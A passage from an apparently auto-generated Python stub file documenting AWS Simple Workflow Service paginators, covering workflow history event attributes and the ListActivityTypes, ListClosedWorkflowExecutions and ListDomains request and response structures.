The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that failed.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **reason** *(string) --*
The reason for the failure (if provided).
- **details** *(string) --*
The details of the failure (if provided).
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionTimedOutEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionTimedOut`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that timed out.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **timeoutType** *(string) --*
The type of the timeout that caused the child workflow execution to time out.
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionCanceledEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionCanceled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that was canceled.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **details** *(string) --*
Details of the cancellation (if provided).
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **childWorkflowExecutionTerminatedEventAttributes** *(dict) --*
If the event is of type ``ChildWorkflowExecutionTerminated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The child workflow execution that was terminated.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the child workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **initiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` Decision to start this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ChildWorkflowExecutionStarted`` event recorded when this child workflow execution was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **signalExternalWorkflowExecutionInitiatedEventAttributes** *(dict) --*
If the event is of type ``SignalExternalWorkflowExecutionInitiated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the external workflow execution.
- **runId** *(string) --*
The ``runId`` of the external workflow execution to send the signal to.
- **signalName** *(string) --*
The name of the signal.
- **input** *(string) --*
The input provided to the signal.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``SignalExternalWorkflowExecution`` decision for this signal. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent decision tasks.
- **externalWorkflowExecutionSignaledEventAttributes** *(dict) --*
If the event is of type ``ExternalWorkflowExecutionSignaled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The external workflow execution that the signal was delivered to.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **initiatedEventId** *(integer) --*
The ID of the ``SignalExternalWorkflowExecutionInitiated`` event corresponding to the ``SignalExternalWorkflowExecution`` decision to request this signal. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **signalExternalWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``SignalExternalWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the external workflow execution that the signal was being delivered to.
- **runId** *(string) --*
The ``runId`` of the external workflow execution that the signal was being delivered to.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **initiatedEventId** *(integer) --*
The ID of the ``SignalExternalWorkflowExecutionInitiated`` event corresponding to the ``SignalExternalWorkflowExecution`` decision to request this signal. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``SignalExternalWorkflowExecution`` decision for this signal. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **control** *(string) --*
The data attached to the event that the decider can use in subsequent workflow tasks. This data isn't sent to the workflow execution.
- **externalWorkflowExecutionCancelRequestedEventAttributes** *(dict) --*
If the event is of type ``ExternalWorkflowExecutionCancelRequested`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowExecution** *(dict) --*
The external workflow execution to which the cancellation request was delivered.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **initiatedEventId** *(integer) --*
The ID of the ``RequestCancelExternalWorkflowExecutionInitiated`` event corresponding to the ``RequestCancelExternalWorkflowExecution`` decision to cancel this external workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **requestCancelExternalWorkflowExecutionInitiatedEventAttributes** *(dict) --*
If the event is of type ``RequestCancelExternalWorkflowExecutionInitiated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the external workflow execution to be canceled.
- **runId** *(string) --*
The ``runId`` of the external workflow execution to be canceled.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RequestCancelExternalWorkflowExecution`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent workflow tasks.
- **requestCancelExternalWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``RequestCancelExternalWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowId** *(string) --*
The ``workflowId`` of the external workflow to which the cancel request was to be delivered.
- **runId** *(string) --*
The ``runId`` of the external workflow execution.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **initiatedEventId** *(integer) --*
The ID of the ``RequestCancelExternalWorkflowExecutionInitiated`` event corresponding to the ``RequestCancelExternalWorkflowExecution`` decision to cancel this external workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RequestCancelExternalWorkflowExecution`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **control** *(string) --*
The data attached to the event that the decider can use in subsequent workflow tasks. This data isn't sent to the workflow execution.
- **scheduleActivityTaskFailedEventAttributes** *(dict) --*
If the event is of type ``ScheduleActivityTaskFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **activityType** *(dict) --*
The activity type provided in the ``ScheduleActivityTask`` decision that failed.
- **name** *(string) --*
The name of this activity.
.. note::
The combination of activity type name and version must be unique within a domain.
- **version** *(string) --*
The version of this activity.
.. note::
The combination of activity type name and version must be unique with in a domain.
- **activityId** *(string) --*
The activityId provided in the ``ScheduleActivityTask`` decision that failed.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision that resulted in the scheduling of this activity task. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **requestCancelActivityTaskFailedEventAttributes** *(dict) --*
If the event is of type ``RequestCancelActivityTaskFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **activityId** *(string) --*
The activityId provided in the ``RequestCancelActivityTask`` decision that failed.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RequestCancelActivityTask`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startTimerFailedEventAttributes** *(dict) --*
If the event is of type ``StartTimerFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The timerId provided in the ``StartTimer`` decision that failed.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``StartTimer`` decision for this activity task. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **cancelTimerFailedEventAttributes** *(dict) --*
If the event is of type ``CancelTimerFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The timerId provided in the ``CancelTimer`` decision that failed.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CancelTimer`` decision to cancel this timer. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startChildWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``StartChildWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowType** *(dict) --*
The workflow type provided in the ``StartChildWorkflowExecution`` Decision that failed.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
When ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision fails because it lacks sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **workflowId** *(string) --*
The ``workflowId`` of the child workflow execution.
- **initiatedEventId** *(integer) --*
When the ``cause`` is ``WORKFLOW_ALREADY_RUNNING`` , ``initiatedEventId`` is the ID of the ``StartChildWorkflowExecutionInitiated`` event that corresponds to the ``StartChildWorkflowExecution`` Decision to start the workflow execution. You can use this information to diagnose problems by tracing back the chain of events leading up to this event.
When the ``cause`` isn't ``WORKFLOW_ALREADY_RUNNING`` , ``initiatedEventId`` is set to ``0`` because the ``StartChildWorkflowExecutionInitiated`` event doesn't exist.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``StartChildWorkflowExecution`` Decision to request this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events.
- **control** *(string) --*
The data attached to the event that the decider can use in subsequent workflow tasks. This data isn't sent to the child workflow execution.
- **lambdaFunctionScheduledEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionScheduled`` event. It isn't set for other event types.
- **id** *(string) --*
The unique ID of the Lambda task.
- **name** *(string) --*
The name of the Lambda function.
- **control** *(string) --*
Data attached to the event that the decider can use in subsequent workflow tasks. This data isn't sent to the Lambda task.
- **input** *(string) --*
The input provided to the Lambda task.
- **startToCloseTimeout** *(string) --*
The maximum amount of time a worker can take to process the Lambda task.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``LambdaFunctionCompleted`` event corresponding to the decision that resulted in scheduling this activity task. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **lambdaFunctionStartedEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionStarted`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
The ID of the ``LambdaFunctionScheduled`` event that was recorded when this activity task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **lambdaFunctionCompletedEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionCompleted`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
The ID of the ``LambdaFunctionScheduled`` event that was recorded when this Lambda task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``LambdaFunctionStarted`` event recorded when this activity task started. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **result** *(string) --*
The results of the Lambda task.
- **lambdaFunctionFailedEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionFailed`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
The ID of the ``LambdaFunctionScheduled`` event that was recorded when this activity task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``LambdaFunctionStarted`` event recorded when this activity task started. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **reason** *(string) --*
The reason provided for the failure.
- **details** *(string) --*
The details of the failure.
- **lambdaFunctionTimedOutEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionTimedOut`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
The ID of the ``LambdaFunctionScheduled`` event that was recorded when this activity task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ActivityTaskStarted`` event that was recorded when this activity task started. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **timeoutType** *(string) --*
The type of the timeout that caused this event.
- **scheduleLambdaFunctionFailedEventAttributes** *(dict) --*
Provides the details of the ``ScheduleLambdaFunctionFailed`` event. It isn't set for other event types.
- **id** *(string) --*
The ID provided in the ``ScheduleLambdaFunction`` decision that failed.
- **name** *(string) --*
The name of the Lambda function.
- **cause** *(string) --*
The cause of the failure. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``LambdaFunctionCompleted`` event corresponding to the decision that resulted in scheduling this Lambda task. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **startLambdaFunctionFailedEventAttributes** *(dict) --*
Provides the details of the ``StartLambdaFunctionFailed`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **cause** *(string) --*
The cause of the failure. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because the IAM role attached to the execution lacked sufficient permissions. For details and example IAM policies, see `Lambda Tasks <http://docs.aws.amazon.com/amazonswf/latest/developerguide/lambda-task.html>`__ in the *Amazon SWF Developer Guide* .
- **message** *(string) --*
A description that can help diagnose the cause of the fault.
- **NextToken** *(string) --*
A token to resume pagination.
:type domain: string
:param domain: **[REQUIRED]**
The name of the domain containing the workflow execution.
:type execution: dict
:param execution: **[REQUIRED]**
Specifies the workflow execution for which to return the history.
- **workflowId** *(string) --* **[REQUIRED]**
The user defined identifier associated with the workflow execution.
- **runId** *(string) --* **[REQUIRED]**
A system-generated unique identifier for the workflow execution.
:type reverseOrder: boolean
:param reverseOrder:
When set to ``true`` , returns the events in reverse order. By default the results are returned in ascending order of the ``eventTimeStamp`` of the events.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListActivityTypes(Paginator):
def paginate(self, domain: str, registrationStatus: str, name: str = None, reverseOrder: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`SWF.Client.list_activity_types`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/swf-2012-01-25/ListActivityTypes>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
domain='string',
name='string',
registrationStatus='REGISTERED'|'DEPRECATED',
reverseOrder=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'typeInfos': [
{
'activityType': {
'name': 'string',
'version': 'string'
},
'status': 'REGISTERED'|'DEPRECATED',
'description': 'string',
'creationDate': datetime(2015, 1, 1),
'deprecationDate': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Contains a paginated list of activity type information structures.
- **typeInfos** *(list) --*
List of activity type information.
- *(dict) --*
Detailed information about an activity type.
- **activityType** *(dict) --*
The ActivityType type structure representing the activity type.
- **name** *(string) --*
The name of this activity.
.. note::
The combination of activity type name and version must be unique within a domain.
- **version** *(string) --*
The version of this activity.
.. note::
The combination of activity type name and version must be unique with in a domain.
- **status** *(string) --*
The current status of the activity type.
- **description** *(string) --*
The description of the activity type provided in RegisterActivityType .
- **creationDate** *(datetime) --*
The date and time this activity type was created through RegisterActivityType .
- **deprecationDate** *(datetime) --*
If DEPRECATED, the date and time DeprecateActivityType was called.
- **NextToken** *(string) --*
A token to resume pagination.
:type domain: string
:param domain: **[REQUIRED]**
The name of the domain in which the activity types have been registered.
:type name: string
:param name:
If specified, only lists the activity types that have this name.
:type registrationStatus: string
:param registrationStatus: **[REQUIRED]**
Specifies the registration status of the activity types to list.
:type reverseOrder: boolean
:param reverseOrder:
When set to ``true`` , returns the results in reverse order. By default, the results are returned in ascending alphabetical order by ``name`` of the activity types.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListClosedWorkflowExecutions(Paginator):
def paginate(self, domain: str, startTimeFilter: Dict = None, closeTimeFilter: Dict = None, executionFilter: Dict = None, closeStatusFilter: Dict = None, typeFilter: Dict = None, tagFilter: Dict = None, reverseOrder: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`SWF.Client.list_closed_workflow_executions`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/swf-2012-01-25/ListClosedWorkflowExecutions>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
domain='string',
startTimeFilter={
'oldestDate': datetime(2015, 1, 1),
'latestDate': datetime(2015, 1, 1)
},
closeTimeFilter={
'oldestDate': datetime(2015, 1, 1),
'latestDate': datetime(2015, 1, 1)
},
executionFilter={
'workflowId': 'string'
},
closeStatusFilter={
'status': 'COMPLETED'|'FAILED'|'CANCELED'|'TERMINATED'|'CONTINUED_AS_NEW'|'TIMED_OUT'
},
typeFilter={
'name': 'string',
'version': 'string'
},
tagFilter={
'tag': 'string'
},
reverseOrder=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'executionInfos': [
{
'execution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'startTimestamp': datetime(2015, 1, 1),
'closeTimestamp': datetime(2015, 1, 1),
'executionStatus': 'OPEN'|'CLOSED',
'closeStatus': 'COMPLETED'|'FAILED'|'CANCELED'|'TERMINATED'|'CONTINUED_AS_NEW'|'TIMED_OUT',
'parent': {
'workflowId': 'string',
'runId': 'string'
},
'tagList': [
'string',
],
'cancelRequested': True|False
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Contains a paginated list of information about workflow executions.
- **executionInfos** *(list) --*
The list of workflow information structures.
- *(dict) --*
Contains information about a workflow execution.
- **execution** *(dict) --*
The workflow execution this information is about.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **startTimestamp** *(datetime) --*
The time when the execution was started.
- **closeTimestamp** *(datetime) --*
The time when the workflow execution was closed. Set only if the execution status is CLOSED.
- **executionStatus** *(string) --*
The current status of the execution.
- **closeStatus** *(string) --*
If the execution status is closed then this specifies how the execution was closed:
* ``COMPLETED`` – the execution was successfully completed.
* ``CANCELED`` – the execution was canceled.Cancellation allows the implementation to gracefully clean up before the execution is closed.
* ``TERMINATED`` – the execution was force terminated.
* ``FAILED`` – the execution failed to complete.
* ``TIMED_OUT`` – the execution did not complete in the alloted time and was automatically timed out.
* ``CONTINUED_AS_NEW`` – the execution is logically continued. This means the current execution was completed and a new execution was started to carry on the workflow.
- **parent** *(dict) --*
If this workflow execution is a child of another execution then contains the workflow execution that started this execution.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **tagList** *(list) --*
The list of tags associated with the workflow execution. Tags can be used to identify and list workflow executions of interest through the visibility APIs. A workflow execution can have a maximum of 5 tags.
- *(string) --*
- **cancelRequested** *(boolean) --*
Set to true if a cancellation is requested for this workflow execution.
- **NextToken** *(string) --*
A token to resume pagination.
:type domain: string
:param domain: **[REQUIRED]**
The name of the domain that contains the workflow executions to list.
:type startTimeFilter: dict
:param startTimeFilter:
If specified, the workflow executions are included in the returned results based on whether their start times are within the range specified by this filter. Also, if this parameter is specified, the returned results are ordered by their start times.
.. note::
``startTimeFilter`` and ``closeTimeFilter`` are mutually exclusive. You must specify one of these in a request but not both.
- **oldestDate** *(datetime) --* **[REQUIRED]**
Specifies the oldest start or close date and time to return.
- **latestDate** *(datetime) --*
Specifies the latest start or close date and time to return.
:type closeTimeFilter: dict
:param closeTimeFilter:
If specified, the workflow executions are included in the returned results based on whether their close times are within the range specified by this filter. Also, if this parameter is specified, the returned results are ordered by their close times.
.. note::
``startTimeFilter`` and ``closeTimeFilter`` are mutually exclusive. You must specify one of these in a request but not both.
- **oldestDate** *(datetime) --* **[REQUIRED]**
Specifies the oldest start or close date and time to return.
- **latestDate** *(datetime) --*
Specifies the latest start or close date and time to return.
:type executionFilter: dict
:param executionFilter:
If specified, only workflow executions matching the workflow ID specified in the filter are returned.
.. note::
``closeStatusFilter`` , ``executionFilter`` , ``typeFilter`` and ``tagFilter`` are mutually exclusive. You can specify at most one of these in a request.
- **workflowId** *(string) --* **[REQUIRED]**
The workflowId to pass of match the criteria of this filter.
:type closeStatusFilter: dict
:param closeStatusFilter:
If specified, only workflow executions that match this *close status* are listed. For example, if TERMINATED is specified, then only TERMINATED workflow executions are listed.
.. note::
``closeStatusFilter`` , ``executionFilter`` , ``typeFilter`` and ``tagFilter`` are mutually exclusive. You can specify at most one of these in a request.
- **status** *(string) --* **[REQUIRED]**
The close status that must match the close status of an execution for it to meet the criteria of this filter.
:type typeFilter: dict
:param typeFilter:
If specified, only executions of the type specified in the filter are returned.
.. note::
``closeStatusFilter`` , ``executionFilter`` , ``typeFilter`` and ``tagFilter`` are mutually exclusive. You can specify at most one of these in a request.
- **name** *(string) --* **[REQUIRED]**
Name of the workflow type.
- **version** *(string) --*
Version of the workflow type.
:type tagFilter: dict
:param tagFilter:
If specified, only executions that have the matching tag are listed.
.. note::
``closeStatusFilter`` , ``executionFilter`` , ``typeFilter`` and ``tagFilter`` are mutually exclusive. You can specify at most one of these in a request.
- **tag** *(string) --* **[REQUIRED]**
Specifies the tag that must be associated with the execution for it to meet the filter criteria.
:type reverseOrder: boolean
:param reverseOrder:
When set to ``true`` , returns the results in reverse order. By default the results are returned in descending order of the start or the close time of the executions.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListDomains(Paginator):
def paginate(self, registrationStatus: str, reverseOrder: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`SWF.Client.list_domains`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/swf-2012-01-25/ListDomains>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
registrationStatus='REGISTERED'|'DEPRECATED',
reverseOrder=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'domainInfos': [
{
'name': 'string',
'status': 'REGISTERED'|'DEPRECATED',
'description': 'string'
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Contains a paginated collection of DomainInfo structures.
- **domainInfos** *(list) --*
A list of DomainInfo structures.
- *(dict) --*
Contains general information about a domain.
- **name** *(string) --*
The name of the domain. This name is unique within the account.
- **status** *(string) --*
The status of the domain:
* ``REGISTERED`` – The domain is properly registered and available. You can use this domain for registering types and creating new workflow executions.
